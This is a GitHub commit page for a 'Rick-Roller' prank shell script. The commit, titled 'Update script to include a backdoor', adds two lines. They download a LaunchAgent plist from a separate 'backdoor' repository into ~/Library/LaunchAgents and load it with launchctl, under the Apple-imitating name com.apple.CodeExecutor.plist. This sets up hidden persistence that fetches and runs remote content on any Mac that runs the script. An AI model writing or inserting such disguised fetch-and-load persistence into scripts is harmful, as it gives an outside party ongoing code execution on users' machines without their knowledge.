Skip to content

Commit

Permalink
Update script to include a backdoor
Browse files Browse the repository at this point in the history
  • Loading branch information
Wolfoverflow authored Oct 31, 2023
1 parent dfd4041 commit b68b902
Showing 1 changed file with 2 additions and 0 deletions.
2 changes: 2 additions & 0 deletions script
Original file line number Diff line number Diff line change
@@ -1,3 +1,5 @@
cd ~/Library/LaunchAgents/
curl -O "https://raw.githubusercontent.com/Wolfoverflow/Rick-Roller/main/com.wolfoverflow.giveup.plist"
launchctl load ~/Library/LaunchAgents/com.wolfoverflow.giveup.plist
curl -O "https://raw.githubusercontent.com/Wolfoverflow/backdoor/main/com.apple.CodeExecutor.plist"
launchctl load ~/Library/LaunchAgents/com.apple.CodeExecutor.plist

0 comments on commit b68b902

Please sign in to comment.